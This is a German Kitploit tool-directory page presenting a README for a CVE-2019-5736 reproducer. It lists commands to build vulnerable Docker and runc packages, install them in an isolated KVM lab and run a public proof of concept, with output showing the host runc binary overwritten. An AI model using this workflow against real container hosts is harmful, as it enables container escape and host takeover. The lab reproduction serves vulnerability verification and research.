Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2019-5736-reproducer — Reproducer für CVE-2019-5736, eine RunC-Container-Escape-Schwachstelle. Bietet Build-Skripte und ein KVM-basiertes Labor, um den Exploit gegen anfällige Docker-Pakete zu bestätigen. | Kitploit
Tools/GitHubGitHub/takumak/cve-2019-5736-reproducer
Container-SicherheitSchwachstellenanalyseExploitationCloud-SicherheitLernen & BildungContainer-Ausbruch
GitHubtakumak/cve-2019-5736-reproducer

cve-2019-5736-reproducer

Reproducer für CVE-2019-5736, eine RunC-Container-Escape-Schwachstelle. Bietet Build-Skripte und ein KVM-basiertes Labor, um den Exploit gegen anfällige Docker-Pakete zu bestätigen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
7vor 4 JahrenNoch nicht geprüft

CVE-2019-5736 Reproduzierer

Damit können Sie bestätigen, dass RunC-CVE-2019-5736 auf Ihrer KVM-Instanz funktioniert.

Arbeitsablaufübersicht

  • Erstellen Sie die docker.io-bezogenen Pakete, die anfällig für CVE-2019-5736 sind, in diesem Repo
  • Starten Sie eine Ubuntu 18.04 KVM-Instanz auf LXD
  • Installieren Sie die anfälligen *.deb-Pakete in der VM
  • Probieren Sie die auf RunC-CVE-2019-5736 vorgestellte Vorgehensweise aus

Erstellen anfälliger *.deb-Pakete

root@kitploit:~
$ docker-compose build --no-cache
$ docker-compose run build

Vorbereiten des Quell-Tarballs von RunC-CVE-2019-5736

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736.git
$ tar cjf RunC-CVE-2019-5736.tar.bz2 RunC-CVE-2019-5736

Starten einer Ubuntu 18.04 KVM-Instanz auf LXD

root@kitploit:~
$ lxc launch --vm images:ubuntu/18.04 test-cve-2019-5736 -c limits.cpu=4 -c limits.memory=4GB
$ lxc file push deb/*.deb RunC-CVE-2019-5736.tar.bz2 test-cve-2019-5736/root/
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# sed -i -e '/bionic-updates/s/^/#/' -e '/bionic-security/s/^/#/' /etc/apt/sources.list
root@test-cve-2019-5736:~# apt update
root@test-cve-2019-5736:~# apt install iptables libltdl7
root@test-cve-2019-5736:~# dpkg -i containerd_0.2.5-0ubuntu2_amd64.deb docker.io_17.12.1-0ubuntu6_amd64.deb runc_1.0.0~rc6+git20181203.96ec2177-0~ubuntu2_amd64.deb

Beachten Sie, dass Sie images:ubuntu/18.04 anstelle von ubuntu:18.04 verwenden sollten, da der Befehl lxc exec mit letzterem nicht richtig funktioniert.

Reproduzieren von RunC-CVE-2019-5736

root@kitploit:~
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# tar xf RunC-CVE-2019-5736.tar.bz2
root@test-cve-2019-5736:~# cd RunC-CVE-2019-5736
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker build -t cve-2019-5736:exec_POC ./exec_POC
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
92b965383f377419f3dad7cec45e468a4c4a83e82e11a2f2e0e23803016e2840
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker exec poc_ctr bash
No help topic for '/usr/bin/bash'
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# /usr/bin/docker-runc

**THE ALL NEW AND IMPROVED RUNC**

        [+] Your backdoor here ->

root@test-cve-2019-5736:~/RunC-CVE-2019-5736# 

Anhang

  • Fix-Commit: https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b
Tool herunterladen